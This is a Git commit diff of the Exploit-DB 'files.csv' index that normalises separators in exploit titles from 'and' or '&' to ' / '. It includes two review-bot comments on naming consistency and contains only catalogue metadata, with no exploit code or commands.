DB: 2017-10-12

5 new exploits

MultiTheftAuto 0.5 patch 1 - Server Crash and MOTD Deletion Exploit
MultiTheftAuto 0.5 patch 1 - Server Crash / MOTD Deletion Exploit
Amaya Web Editor 11.0 - XML and HTML parser Vulnerabilities
Amaya Web Editor 11.0 - XML / HTML Parser Vulnerabilities
Apple Safari & QuickTime - Denial of Service
Apple Safari / QuickTime - Denial of Service
Real Helix DNA - RTSP and SETUP Request Handler Vulnerabilities
Real Helix DNA - RTSP / SETUP Request Handler Vulnerabilities
Juniper Networks JUNOS 7.1.1 - Malformed TCP Packet Denial of Service and Unspecified Vulnerabilities
Juniper Networks JUNOS 7.1.1 - Malformed TCP Packet Denial of Service / Unspecified Vulnerabilities
Novell Netware - CIFS And AFP Remote Memory Consumption Denial of Service
Novell Netware - CIFS and AFP Remote Memory Consumption Denial of Service
Multiple Adobe Products - XML External Entity And XML Injection Vulnerabilities
Multiple Adobe Products - XML External Entity / XML Injection Vulnerabilities
Ghost Recon Advanced Warfighter - Integer Overflow and Array Indexing Overflow
Ghost Recon Advanced Warfighter - Integer Overflow / Array Indexing Overflow
Webkit (Apple Safari < 4.1.2/5.0.2 & Google Chrome < 5.0.375.125) - Memory Corruption
Webkit (Apple Safari < 4.1.2/5.0.2 / Google Chrome < 5.0.375.125) - Memory Corruption
Mozilla Firefox - Interleaving document.write and appendChild Denial of Service
Mozilla Firefox - Interleaving 'document.write' / 'appendChild' Denial of Service
Avirt Mail 4.0/4.2 - 'Mail From:' and 'Rcpt to:' Denial of Service
Avirt Mail 4.0/4.2 - 'Mail From:' / 'Rcpt to:' Denial of Service
BRS Webweaver 1.0 4 - POST and HEAD Denial of Service
BRS Webweaver 1.0 4 - POST / HEAD Denial of Service
Microsoft IIS 5.0 - WebDAV PROPFIND and SEARCH Method Denial of Service
Microsoft IIS 5.0 - WebDAV PROPFIND / SEARCH Method Denial of Service
Microsoft Internet Explorer 5.0.1 - Malformed IMG and XML Parsing Denial of Service
Microsoft Internet Explorer 5.0.1 - Malformed .IMG / .XML Parsing Denial of Service
Extended Module Player (xmp) 2.5.1 - 'oxm.c' And 'dtt_load.c' Multiple Local Buffer Overflow Vulnerabilities
Extended Module Player (xmp) 2.5.1 - 'oxm.c' / 'dtt_load.c' Multiple Local Buffer Overflow Vulnerabilities
Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free and Memory Corruption (PoC) (MS14-035)
Microsoft Internet Explorer 9/10 - CFormElement Use-After-Free / Memory Corruption (PoC) (MS14-035)
Ubisoft Ghost Recon Advanced Warfighter - Integer Overflow and Array Indexing Overflow
Ubisoft Ghost Recon Advanced Warfighter - Integer Overflow / Array Indexing Overflow
Adobe Photoshop CC & Bridge CC - '.iff' Parsing Memory Corruption
Adobe Photoshop CC / Bridge CC - '.iff' Parsing Memory Corruption
Nitro Pro 10.5.7.32 & Nitro Reader 5.5.3.1 - Heap Memory Corruption
Nitro Pro 10.5.7.32 / Nitro Reader 5.5.3.1 - Heap Memory Corruption
Microsoft Windows - GDI+ EMR_EXTTEXTOUTA and EMR_POLYTEXTOUTA Heap Based Buffer Overflow (MS16-097)
Microsoft Windows - GDI+ EMR_EXTTEXTOUTA / EMR_POLYTEXTOUTA Heap Based Buffer Overflow (MS16-097)
Google Android - 'cfp_ropp_new_key_reenc' and 'cfp_ropp_new_key' RKP Memory Corruption
Google Android - 'cfp_ropp_new_key_reenc' / 'cfp_ropp_new_key' RKP Memory Corruption
Microsoft Windows Kernel - Registry Hive Loading Crashes in nt!nt!HvpGetBinMemAlloc and nt!ExpFindAndRemoveTagBigPages (MS17-017)
Microsoft Windows Kernel - Registry Hive Loading Crashes in nt!nt!HvpGetBinMemAlloc / nt!ExpFindAndRemoveTagBigPages (MS17-017)
Microsoft Windows 7 Kernel - Pool-Based Out-of-Bounds Reads Due to bind() Implementation Bugs in afd.sys and tcpip.sys
Microsoft Windows 7 Kernel - Pool-Based Out-of-Bounds Reads Due to bind() Implementation Bugs in afd.sys / tcpip.sys
binutils 2.29.51.20170921 - 'read_1_byte' Heap-Based Buffer Overflow
BSD & Linux umount - Privilege Escalation
BSD / Linux - 'umount' Privilege Escalation
BSD & Linux lpr - Privilege Escalation
BSD / Linux - 'lpr' Privilege Escalation
DelphiTurk CodeBank 3.1 - Local 'Username' and Password Disclosure
DelphiTurk CodeBank 3.1 - Local Username and Password Disclosure
SystemTap 1.0/1.1 - '__get_argv()' and '__get_compat_argv()' Local Memory Corruption
SystemTap 1.0/1.1 - '__get_argv()' / '__get_compat_argv()' Local Memory Corruption
Filemaker Pro 13.03 & Advanced 12.04 - Login Bypass / Privilege Escalation
Filemaker Pro 13.03 / Advanced 12.04 - Login Bypass / Privilege Escalation
ASX to MP3 converter < 3.1.3.7 - Stack Overflow (DEP Bypass)
ASX to MP3 converter < 3.1.3.7 - '.asx' Stack Overflow (DEP Bypass)
ASX to MP3 3.1.3.7 - '.m3u' Buffer Overflow
Microsoft Windows - WINS Vulnerability and OS/SP Scanner
Microsoft Windows - WINS Vulnerability + OS/SP Scanner
Mozilla Firefox 3.6.8 < 3.6.11 - Interleaving document.write and appendChild Exploit (From the Wild)
Mozilla Firefox 3.6.8 < 3.6.11 - Interleaving 'document.write' / 'appendChild' Exploit
Mozilla Firefox - Interleaving document.write and appendChild Exploit (Metasploit)
Mozilla Firefox - Interleaving 'document.write' / 'appendChild' Exploit (Metasploit)
Quest InTrust 10.4.x - ReportTree and SimpleTree Classes
Quest InTrust 10.4.x - ReportTree / SimpleTree Classes
SunOS 4.1.3 - LD_LIBRARY_PATH and LD_OPTIONS
SunOS 4.1.3 - LD_LIBRARY_PATH / LD_OPTIONS Exploit
RedHat Linux 5.1 & Caldera OpenLinux Standard 1.2 - Mountd
RedHat Linux 5.1 / Caldera OpenLinux Standard 1.2 - Mountd
Microsoft IIS 3.0/4.0 - Using ASP And FSO To Read Server Files
Microsoft IIS 3.0/4.0 - Using ASP and FSO To Read Server Files
tcpdump 3.4 - Protocol Four and Zero Header Length
tcpdump 3.4 - Protocol Four / Zero Header Length
Symantec pcAnywhere 12.5.0 - Login and Password Field Buffer Overflow
Symantec pcAnywhere 12.5.0 - 'Login' / 'Password' Buffer Overflow
Microsoft Internet Explorer 5.0/4.0.1 - IFRAME Exploit
Microsoft Internet Explorer 5.0/4.0.1 - iFrame Exploit
Internet Security Systems ICECap Manager 2.0.23 - Default 'Username' and Password
Internet Security Systems ICECap Manager 2.0.23 - Default Username and Password
Technote 2000/2001 - 'Filename' Parameter Command Execution And File Disclosure
Technote 2000/2001 - 'Filename' Parameter Command Execution and File Disclosure
WFTPD 3.0 - 'RETR' and 'CWD' Buffer Overflow
WFTPD 3.0 - 'RETR' / 'CWD' Buffer Overflow
EFTP Server 2.0.7.337 - Directory and File Existence
EFTP Server 2.0.7.337 - Directory Existence / File Existence
Bajie HTTP Server 0.95 - Example Scripts And Servlets Cross-Site Scripting
Bajie HTTP Server 0.95 - Example Scripts and Servlets Cross-Site Scripting
InternetNow ProxyNow 2.6/2.75 - Multiple Stack and Heap Overflow Vulnerabilities
InternetNow ProxyNow 2.6/2.75 - Multiple Stack / Heap Overflow Vulnerabilities
Microsoft Windows XP - Help And Support Center Interface Spoofing
Microsoft Windows XP - Help and Support Center Interface Spoofing
BigAnt Server 2.97 - SCH And DUPF Buffer Overflow (Metasploit)
BigAnt Server 2.97 - SCH / DUPF Buffer Overflow (Metasploit)
Adobe Acrobat 7.0 / Adobe Reader 7.0 - File Existence and Disclosure
Adobe Acrobat 7.0 / Adobe Reader 7.0 - File Existence / File Disclosure
Apache 2.2.6 mod_negotiation - HTML Injection and HTTP Response Splitting
Apache 2.2.6 mod_negotiation - HTML Injection / HTTP Response Splitting
3D-FTP 8.01 - 'LIST' and 'MLSD' Directory Traversal
3D-FTP 8.01 - 'LIST' / 'MLSD' Directory Traversal
Apache Tomcat 7.0.4 - 'sort' and 'orderBy' Parameters Cross-Site Scripting
Apache Tomcat 7.0.4 - 'sort' / 'orderBy' Cross-Site Scripting
Apple macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution and Arbitrary File Read
Apple macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution / Arbitrary File Read
Github Enterprise - Default Session Secret And Deserialization (Metasploit)
Github Enterprise - Default Session Secret and Deserialization (Metasploit)
VX Search Enterprise 10.1.12 - Buffer Overflow
QUOTE&ORDERING SYSTEM 1.0 - 'ordernum' Multiple Vulnerabilities
Quote&Ordering System 1.0 - 'ordernum' Multiple Vulnerabilities
Joomla! Component Flash uploader 2.5.1 - Remote File Inclusion
Joomla! Component Flash Uploader 2.5.1 - Remote File Inclusion
FlexPHPNews 0.0.6 & PRO - Authentication Bypass
FlexPHPNews 0.0.6 / PRO - Authentication Bypass
click&rank - SQL Injection / Cross-Site Scripting
Click&Rank - SQL Injection / Cross-Site Scripting
WordPress Core & MU & Plugins - 'admin.php' Privileges Unchecked / Multiple Information Disclosures
WordPress Core / MU / Plugins - 'admin.php' Privileges Unchecked / Multiple Information Disclosures
PRE HOTELS&RESORTS MANAGEMENT SYSTEM - Authentication Bypass
Pre Hotels&Resorts Management System - Authentication Bypass
PHP-Nuke CMS - (Survey and Poll) SQL Injection
PHP-Nuke CMS (Survey and Poll) - SQL Injection
60 cycleCMS 2.5.2 - Cross-Site Request Forgery (Change 'Username' and Password)
60 cycleCMS 2.5.2 - Cross-Site Request Forgery (Change Username and Password)
XT-Commerce 1.0 Beta 1 - Pass / Creat and Download Backup
XT-Commerce 1.0 Beta 1 - Pass / Create and Download Backup
Allomani Songs & Clips Script 2.7.0 - Cross-Site Request Forgery (Add Admin)
Allomani Songs & Clips 2.7.0 - Cross-Site Request Forgery (Add Admin)
Sun i-Runbook 2.5.2 - Directory And File Content Disclosure
Sun i-Runbook 2.5.2 - Directory and File Content Disclosure
DUclassmate 1.x - account.asp MM-recordId Parameter Arbitrary Password Modification
DUclassmate 1.x - 'account.asp MM-recordId' Arbitrary Password Modification
DUforum 3.x - messages.asp FOR_ID Parameter SQL Injection
DUforum 3.x - messageDetail.asp MSG_ID Parameter SQL Injection
DUforum 3.x - 'messages.asp FOR_ID' SQL Injection
DUforum 3.x - 'messageDetail.asp MSG_ID' SQL Injection
SquirrelMail G/PGP Encryption Plugin 2.0/2.1 - Access Validation And Input Validation
SquirrelMail G/PGP Encryption Plugin 2.0/2.1 - Access Validation / Input Validation
JAF CMS 4.0.0 RC2 - 'website' and 'main_dir' Parameters Multiple Remote File Inclusion
JAF CMS 4.0.0 RC2 - 'website' / 'main_dir' Multiple Remote File Inclusion
WordPress Plugin WP BackupPlus - Database And Files Backup Download
WordPress Plugin WP BackupPlus - Database and Files Backup Download
WebsiteKit Gbplus - Name and Body Fields HTML Injection Vulnerabilities
WebsiteKit Gbplus - 'Name' / 'Body' HTML Injection
Gogs - (users and repos q pararm) SQL Injection
Gogs - users and repos q SQL Injection
WebFileExplorer 3.6 - 'user' and 'pass' SQL Injection
WebFileExplorer 3.6 - 'user' / 'pass' SQL Injection
Joomla! Component 'com_tree' - 'key' Parameter SQL Injection
Joomla! Component com_tree - 'key' Parameter SQL Injection
Ilient SysAid 8.5.5 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities
Ilient SysAid 8.5.5 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities
WeBid - Multiple Cross-Site Scripting And LDAP Injection Vulnerabilities
WeBid - Multiple Cross-Site Scripting / LDAP Injection Vulnerabilities
Squiz CMS - Multiple Cross-Site Scripting and XML External Entity Injection Vulnerabilities
Squiz CMS - Multiple Cross-Site Scripting / XML External Entity Injection Vulnerabilities
TOTOLINK Routers - Backdoor and Remote Code Execution (PoC)
TOTOLINK Routers - Backdoor / Remote Code Execution (PoC)
up.time 7.5.0 - Arbitrary File Disclose And Delete Exploit
up.time 7.5.0 - Upload And Execute File Exploit
up.time 7.5.0 - Arbitrary File Disclose and Delete Exploit
up.time 7.5.0 - Upload and Execute Exploit
Wildfly - WEB-INF and META-INF Information Disclosure via Filter Restriction Bypass
Wildfly - 'WEB-INF' / 'META-INF' Information Disclosure via Filter Restriction Bypass
WebKit - enqueuePageshowEvent and enqueuePopstateEvent Universal Cross-Site Scripting
WebKit - 'enqueuePageshowEvent' / 'enqueuePopstateEvent' Universal Cross-Site Scripting
WebKit - 'Document::prepareForDestruction' and 'CachedFrame' Universal Cross-Site Scripting
WebKit - 'Document::prepareForDestruction' / 'CachedFrame' Universal Cross-Site Scripting
WebKit JSC - 'JSObject::putInlineSlow and JSValue::putToPrimitive' Universal Cross-Site Scripting
WebKit JSC - 'JSObject::putInlineSlow' / 'JSValue::putToPrimitive' Universal Cross-Site Scripting
Trend Micro OfficeScan 11.0/XG (12.0) - Remote Code Execution (Metasploit)
Trend Micro InterScan Messaging Security (Virtual Appliance) - Remote Code Execution (Metasploit)
parent b77b178de0
commit 3cfdd1cc27
8 changed files with 737 additions and 86 deletions
173
files.csv
|
@ -227,7 +227,7 @@ id,file,description,date,author,platform,type,port
|
|||
1220,platforms/windows/dos/1220.pl,"Fastream NETFile Web Server 7.1.2 - 'HEAD' Denial of Service",2005-09-16,karak0rsan,windows,dos,0
|
||||
1222,platforms/windows/dos/1222.pl,"MCCS (Multi-Computer Control Systems) Command - Denial of Service",2005-09-19,basher13,windows,dos,0
|
||||
1233,platforms/multiple/dos/1233.html,"Mozilla Firefox 1.0.7 - Integer Overflow Denial of Service",2005-09-26,"Georgi Guninski",multiple,dos,0
|
||||
1235,platforms/windows/dos/1235.c,"MultiTheftAuto 0.5 patch 1 - Server Crash and MOTD Deletion Exploit",2005-09-26,"Luigi Auriemma",windows,dos,0
|
||||
1235,platforms/windows/dos/1235.c,"MultiTheftAuto 0.5 patch 1 - Server Crash / MOTD Deletion Exploit",2005-09-26,"Luigi Auriemma",windows,dos,0
|
||||
1239,platforms/windows/dos/1239.c,"Virtools Web Player 3.0.0.100 - Buffer Overflow Denial of Service",2005-10-02,"Luigi Auriemma",windows,dos,0
|
||||
1246,platforms/windows/dos/1246.pl,"RBExplorer 1.0 - Hijacking Command Denial of Service",2005-10-11,basher13,windows,dos,0
|
||||
1251,platforms/windows/dos/1251.pl,"TYPSoft FTP Server 1.11 - 'RETR' Denial of Service",2005-10-14,wood,windows,dos,0
|
||||
|
@ -927,7 +927,7 @@ id,file,description,date,author,platform,type,port
|
|||
7887,platforms/windows/dos/7887.pl,"Zinf Audio Player 2.2.1 - '.pls' Stack Overflow (PoC)",2009-01-27,Hakxer,windows,dos,0
|
||||
7889,platforms/windows/dos/7889.pl,"Zinf Audio Player 2.2.1 - '.m3u' Local Heap Overflow (PoC)",2009-01-27,Hakxer,windows,dos,0
|
||||
7890,platforms/windows/dos/7890.pl,"Zinf Audio Player 2.2.1 - '.gqmpeg' Buffer Overflow (PoC)",2009-01-27,Hakxer,windows,dos,0
|
||||
7902,platforms/windows/dos/7902.txt,"Amaya Web Editor 11.0 - XML and HTML parser Vulnerabilities",2009-01-28,"Core Security",windows,dos,0
|
||||
7902,platforms/windows/dos/7902.txt,"Amaya Web Editor 11.0 - XML / HTML Parser Vulnerabilities",2009-01-28,"Core Security",windows,dos,0
|
||||
7904,platforms/windows/dos/7904.pl,"Thomson mp3PRO Player/Encoder - '.m3u' Crash (PoC)",2009-01-29,Hakxer,windows,dos,0
|
||||
7906,platforms/windows/dos/7906.pl,"Amaya Web Editor 11.0 - Remote Buffer Overflow (PoC)",2009-01-29,Stack,windows,dos,0
|
||||
7934,platforms/windows/dos/7934.py,"Spider Player 2.3.9.5 - '.asx' Off-by-One Crash",2009-01-30,Houssamix,windows,dos,0
|
||||
|
@ -1073,7 +1073,7 @@ id,file,description,date,author,platform,type,port
|
|||
8899,platforms/windows/dos/8899.txt,"SAP GUI 6.4 - ActiveX (Accept) Remote Buffer Overflow (PoC)",2009-06-08,DSecRG,windows,dos,0
|
||||
8940,platforms/multiple/dos/8940.pl,"Asterisk IAX2 - Attacked IAX Fuzzer Resource Exhaustion (Denial of Service)",2009-06-12,"Blake Cornell",multiple,dos,0
|
||||
8955,platforms/linux/dos/8955.pl,"LinkLogger 2.4.10.15 - (syslog) Denial of Service",2009-06-15,h00die,linux,dos,0
|
||||
8957,platforms/multiple/dos/8957.txt,"Apple Safari & QuickTime - Denial of Service",2009-06-15,"Thierry Zoller",multiple,dos,0
|
||||
8957,platforms/multiple/dos/8957.txt,"Apple Safari / QuickTime - Denial of Service",2009-06-15,"Thierry Zoller",multiple,dos,0
|
||||
8960,platforms/linux/dos/8960.py,"Apple QuickTime - CRGN Atom Local Crash",2009-06-15,webDEViL,linux,dos,0
|
||||
8964,platforms/hardware/dos/8964.txt,"NETGEAR DG632 Router - Remote Denial of Service",2009-06-15,"Tom Neaves",hardware,dos,0
|
||||
8971,platforms/windows/dos/8971.pl,"Carom3D 5.06 - Unicode Buffer Overrun/Denial of Service",2009-06-16,LiquidWorm,windows,dos,0
|
||||
|
@ -1116,7 +1116,7 @@ id,file,description,date,author,platform,type,port
|
|||
9178,platforms/windows/dos/9178.pl,"MixSense 1.0.0.1 DJ Studio - '.mp3' Crash",2009-07-16,prodigy,windows,dos,0
|
||||
9189,platforms/windows/dos/9189.pl,"Streaming Audio Player 0.9 - 'skin' Local Stack Overflow (PoC) (SEH)",2009-07-17,"ThE g0bL!N",windows,dos,0
|
||||
9192,platforms/windows/dos/9192.pl,"Soritong MP3 Player 1.0 - 'SKIN' Local Stack Overflow (PoC) (SEH)",2009-07-17,"ThE g0bL!N",windows,dos,0
|
||||
9198,platforms/multiple/dos/9198.txt,"Real Helix DNA - RTSP and SETUP Request Handler Vulnerabilities",2009-07-17,"Core Security",multiple,dos,0
|
||||
9198,platforms/multiple/dos/9198.txt,"Real Helix DNA - RTSP / SETUP Request Handler Vulnerabilities",2009-07-17,"Core Security",multiple,dos,0
|
||||
9200,platforms/windows/dos/9200.pl,"EpicVJ 1.2.8.0 - '.mpl' / '.m3u' Local Heap Overflow (PoC)",2009-07-20,hack4love,windows,dos,0
|
||||
9206,platforms/freebsd/dos/9206.c,"FreeBSD 7.2 - (pecoff executable) Local Denial of Service",2009-07-20,"Shaun Colley",freebsd,dos,0
|
||||
9212,platforms/windows/dos/9212.pl,"Acoustica MP3 Audio Mixer 2.471 - '.sgp' Crash",2009-07-20,prodigy,windows,dos,0
|
||||
|
@ -1242,7 +1242,7 @@ id,file,description,date,author,platform,type,port
|
|||
10068,platforms/windows/dos/10068.rb,"Microsoft Windows Server 2000 < 2008 - Embedded OpenType Font Engine Remote Code Execution (MS09-065) (Metasploit)",2009-11-12,"H D Moore",windows,dos,0
|
||||
10073,platforms/windows/dos/10073.py,"XM Easy Personal FTP 5.8 - Denial of Service",2009-10-02,PLATEN,windows,dos,21
|
||||
10077,platforms/multiple/dos/10077.txt,"OpenLDAP 2.3.39 - MODRDN Remote Denial of Service",2009-11-09,"Ralf Haferkamp",multiple,dos,389
|
||||
33476,platforms/hardware/dos/33476.pl,"Juniper Networks JUNOS 7.1.1 - Malformed TCP Packet Denial of Service and Unspecified Vulnerabilities",2010-01-07,anonymous,hardware,dos,0
|
||||
33476,platforms/hardware/dos/33476.pl,"Juniper Networks JUNOS 7.1.1 - Malformed TCP Packet Denial of Service / Unspecified Vulnerabilities",2010-01-07,anonymous,hardware,dos,0
|
||||
10091,platforms/windows/dos/10091.txt,"XLPD 3.0 - Remote Denial of Service",2009-10-06,"Francis Provencher",windows,dos,515
|
||||
10092,platforms/windows/dos/10092.txt,"Yahoo! Messenger 9.0.0.2162 - 'YahooBridgeLib.dll' ActiveX Control Remote Denial of Service",2009-11-12,HACKATTACK,windows,dos,0
|
||||
10100,platforms/windows/dos/10100.py,"FTPDMIN 0.96 - 'LIST' Remote Denial of Service",2007-03-20,shinnai,windows,dos,21
|
||||
|
@ -1317,7 +1317,7 @@ id,file,description,date,author,platform,type,port
|
|||
10920,platforms/windows/dos/10920.cpp,"VirtualDJ Trial 6.0.6 'New Year Edition' - '.m3u' Exploit",2010-01-02,"fl0 fl0w",windows,dos,0
|
||||
10947,platforms/hardware/dos/10947.txt,"Facebook for iPhone - Persistent Cross-Site Scripting Denial of Service",2010-01-03,marco_,hardware,dos,0
|
||||
10960,platforms/multiple/dos/10960.pl,"Google Chrome 4.0.249.30 - Denial of Service (PoC)",2010-01-03,anonymous,multiple,dos,0
|
||||
11009,platforms/multiple/dos/11009.pl,"Novell Netware - CIFS And AFP Remote Memory Consumption Denial of Service",2010-01-05,"Francis Provencher",multiple,dos,0
|
||||
11009,platforms/multiple/dos/11009.pl,"Novell Netware - CIFS and AFP Remote Memory Consumption Denial of Service",2010-01-05,"Francis Provencher",multiple,dos,0
|
||||
11020,platforms/windows/dos/11020.pl,"GOM Audio - Local Crash (PoC)",2010-01-06,applicationlayer,windows,dos,0
|
||||
11021,platforms/windows/dos/11021.txt,"FlashGet 3.x - IEHelper Remote Execution (PoC)",2010-01-06,superli,windows,dos,0
|
||||
11034,platforms/windows/dos/11034.txt,"Microsoft HTML Help Compiler (hhc.exe) - Buffer Overflow (PoC)",2010-01-06,s4squatch,windows,dos,0
|
||||
|
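Review bot: Row 11009 only lowercases "And" to "and" ("CIFS and AFP"), while other renames in this same commit turn the same kind of pairing into " / " (for example "'Mail From:' / 'Rcpt to:'" in row 20311 and "POST / HEAD" in row 22650). If the rule is that "and" stays when both items share one flaw and " / " separates distinct issues, say so in the commit message; otherwise make this row "CIFS / AFP" so that searches on the separator behave the same across the file.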
@ -1395,7 +1395,7 @@ id,file,description,date,author,platform,type,port
|
|||
11492,platforms/windows/dos/11492.html,"Rising Online Virus Scanner 22.0.0.5 - ActiveX Control Stack Overflow (Denial of Service)",2010-02-18,wirebonder,windows,dos,0
|
||||
11499,platforms/ios/dos/11499.pl,"iOS FileApp 1.7 - Remote Denial of Service",2010-02-18,Ale46,ios,dos,0
|
||||
11520,platforms/ios/dos/11520.pl,"iOS iFTPStorage 1.2 - Remote Denial of Service",2010-02-22,Ale46,ios,dos,0
|
||||
11529,platforms/multiple/dos/11529.txt,"Multiple Adobe Products - XML External Entity And XML Injection Vulnerabilities",2010-02-22,"Roberto Suggi Liverani",multiple,dos,0
|
||||
11529,platforms/multiple/dos/11529.txt,"Multiple Adobe Products - XML External Entity / XML Injection Vulnerabilities",2010-02-22,"Roberto Suggi Liverani",multiple,dos,0
|
||||
11531,platforms/windows/dos/11531.pl,"Microsoft Windows Media Player 11.0.5721.5145 - '.mpg' Buffer Overflow",2010-02-22,cr4wl3r,windows,dos,0
|
||||
11532,platforms/windows/dos/11532.html,"Winamp 5.57 - (Browser) IE Denial of Service",2010-02-22,cr4wl3r,windows,dos,0
|
||||
11533,platforms/windows/dos/11533.pl,"Nero Burning ROM 9.4.13.2 - (iso compilation) Local Buffer Invasion (PoC)",2010-02-22,LiquidWorm,windows,dos,0
|
||||
|
@ -1622,7 +1622,7 @@ id,file,description,date,author,platform,type,port
|
|||
14185,platforms/multiple/dos/14185.py,"ISC DHCPD - Denial of Service",2010-07-03,sid,multiple,dos,0
|
||||
14236,platforms/windows/dos/14236.txt,"Sun Java Web Server 7.0 u7 - Admin Interface Denial of Service",2010-07-06,muts,windows,dos,8800
|
||||
14268,platforms/multiple/dos/14268.txt,"Qt 4.6.3 - 'QSslSocketBackendPrivate::transmit()' Denial of Service",2010-07-08,"Luigi Auriemma",multiple,dos,0
|
||||
14286,platforms/windows/dos/14286.txt,"Ghost Recon Advanced Warfighter - Integer Overflow and Array Indexing Overflow",2010-07-08,"Luigi Auriemma",windows,dos,0
|
||||
14286,platforms/windows/dos/14286.txt,"Ghost Recon Advanced Warfighter - Integer Overflow / Array Indexing Overflow",2010-07-08,"Luigi Auriemma",windows,dos,0
|
||||
14282,platforms/windows/dos/14282.txt,"Microsoft Windows - 'cmd.exe' Unicode Buffer Overflow (SEH)",2010-07-08,bitform,windows,dos,0
|
||||
14290,platforms/windows/dos/14290.py,"MP3 Cutter 1.5 - Denial of Service",2010-07-09,"Prashant Uniyal",windows,dos,0
|
||||
15307,platforms/windows/dos/15307.py,"HP Data Protector Media Operations 6.11 - HTTP Server Remote Integer Overflow Denial of Service",2010-10-23,d0lc3,windows,dos,0
|
||||
|
@ -1709,7 +1709,7 @@ id,file,description,date,author,platform,type,port
|
|||
14938,platforms/windows/dos/14938.txt,"Internet Download Accelerator 5.8 - Remote Buffer Overflow (PoC)",2010-09-07,eidelweiss,windows,dos,0
|
||||
14947,platforms/bsd/dos/14947.txt,"FreeBSD 8.1/7.3 - vm.pmap Kernel Local Race Condition",2010-09-08,"Maksymilian Arciemowicz",bsd,dos,0
|
||||
14949,platforms/windows/dos/14949.py,"Mozilla Firefox 3.6.3 - XSLT Sort Remote Code Execution",2010-09-09,Abysssec,windows,dos,0
|
||||
14967,platforms/windows/dos/14967.txt,"Webkit (Apple Safari < 4.1.2/5.0.2 & Google Chrome < 5.0.375.125) - Memory Corruption",2010-09-10,"Jose A. Vazquez",windows,dos,0
|
||||
14967,platforms/windows/dos/14967.txt,"Webkit (Apple Safari < 4.1.2/5.0.2 / Google Chrome < 5.0.375.125) - Memory Corruption",2010-09-10,"Jose A. Vazquez",windows,dos,0
|
||||
14971,platforms/windows/dos/14971.py,"Microsoft Word 2007 SP2 - sprmCMajority Buffer Overflow",2010-09-11,Abysssec,windows,dos,0
|
||||
14974,platforms/windows/dos/14974.txt,"HP Data Protector Media Operations 6.11 - Multiple Modules Null Pointer Dereference Denial of Service",2010-09-11,d0lc3,windows,dos,0
|
||||
14987,platforms/windows/dos/14987.py,"Kingsoft AntiVirus 2010.04.26.648 - Kernel Buffer Overflow",2010-09-13,"Lufeng Li",windows,dos,0
|
||||
|
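Review bot: In row 14967 the new " / " between the two products sits inside a parenthetical that already uses "/" to separate versions ("4.1.2/5.0.2"), so the slash now carries two meanings in one title and the product boundary is harder to pick out. Consider a different separator between the products or restructuring the parenthetical. "Webkit" is also left with a lower-case k here, while the commit message writes "WebKit" in the other titles it touches.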
@ -1769,7 +1769,7 @@ id,file,description,date,author,platform,type,port
|
|||
15319,platforms/windows/dos/15319.pl,"Apache 2.2 (Windows) - Local Denial of Service",2010-10-26,fb1h2s,windows,dos,0
|
||||
15334,platforms/windows/dos/15334.py,"MinaliC WebServer 1.0 - Denial of Service",2010-10-27,"John Leitch",windows,dos,0
|
||||
15426,platforms/windows/dos/15426.txt,"Adobe Flash - ActionIf Integer Denial of Service",2010-11-05,"Matthew Bergin",windows,dos,0
|
||||
15341,platforms/multiple/dos/15341.html,"Mozilla Firefox - Interleaving document.write and appendChild Denial of Service",2010-10-28,"Daniel Veditz",multiple,dos,0
|
||||
15341,platforms/multiple/dos/15341.html,"Mozilla Firefox - Interleaving 'document.write' / 'appendChild' Denial of Service",2010-10-28,"Daniel Veditz",multiple,dos,0
|
||||
15342,platforms/multiple/dos/15342.html,"Mozilla Firefox - (Simplified) Memory Corruption (PoC)",2010-10-28,extraexploit,multiple,dos,0
|
||||
15346,platforms/multiple/dos/15346.c,"Platinum SDK Library - post upnp sscanf Buffer Overflow",2010-10-28,n00b,multiple,dos,0
|
||||
15356,platforms/windows/dos/15356.pl,"yPlay 2.4.5 - Denial of Service",2010-10-30,"MOHAMED ABDI",windows,dos,0
|
||||
|
@ -2451,7 +2451,7 @@ id,file,description,date,author,platform,type,port
|
|||
20304,platforms/windows/dos/20304.txt,"Omnicron OmniHTTPd 1.1/2.0 Alpha 1 - 'visiadmin.exe' Denial of Service",1999-06-05,"Valentin Perelogin",windows,dos,0
|
||||
20307,platforms/windows/dos/20307.txt,"Hilgraeve HyperTerminal 6.0 - Telnet Buffer Overflow",2000-10-18,"Ussr Labs",windows,dos,0
|
||||
20310,platforms/windows/dos/20310.txt,"Microsoft IIS 4.0 - Pickup Directory Denial of Service",2000-02-15,Valentijn,windows,dos,0
|
||||
20311,platforms/windows/dos/20311.c,"Avirt Mail 4.0/4.2 - 'Mail From:' and 'Rcpt to:' Denial of Service",2000-10-23,Martin,windows,dos,0
|
||||
20311,platforms/windows/dos/20311.c,"Avirt Mail 4.0/4.2 - 'Mail From:' / 'Rcpt to:' Denial of Service",2000-10-23,Martin,windows,dos,0
|
||||
20323,platforms/hardware/dos/20323.txt,"Cisco IOS 12 - Software '?/' HTTP Request Denial of Service",2000-10-25,"Alberto Solino",hardware,dos,0
|
||||
20328,platforms/hardware/dos/20328.txt,"Intel InBusiness eMail Station 1.4.87 - Denial of Service",2000-10-20,"Knud Erik Højgaard",hardware,dos,0
|
||||
20331,platforms/hardware/dos/20331.c,"Ascend R 4.5 Ci12 - Denial of Service (C)",1998-03-16,Rootshell,hardware,dos,0
|
||||
|
@ -2868,14 +2868,14 @@ id,file,description,date,author,platform,type,port
|
|||
22637,platforms/windows/dos/22637.pl,"Prishtina FTP Client 1.x - Remote Denial of Service",2003-05-23,DHGROUP,windows,dos,0
|
||||
22638,platforms/irix/dos/22638.txt,"IRIX 5.x/6.x - MediaMail HOME Environment Variable Buffer Overflow",2003-05-23,bazarr@ziplip.com,irix,dos,0
|
||||
22647,platforms/hardware/dos/22647.txt,"D-Link DI-704P - Syslog.HTM Denial of Service",2003-05-26,"Chris R",hardware,dos,0
|
||||
22650,platforms/multiple/dos/22650.py,"BRS Webweaver 1.0 4 - POST and HEAD Denial of Service",2003-05-26,euronymous,multiple,dos,0
|
||||
22650,platforms/multiple/dos/22650.py,"BRS Webweaver 1.0 4 - POST / HEAD Denial of Service",2003-05-26,euronymous,multiple,dos,0
|
||||
22653,platforms/windows/dos/22653.py,"Smadav Anti Virus 9.1 - Crash (PoC)",2012-11-12,"Mada R Perdhana",windows,dos,0
|
||||
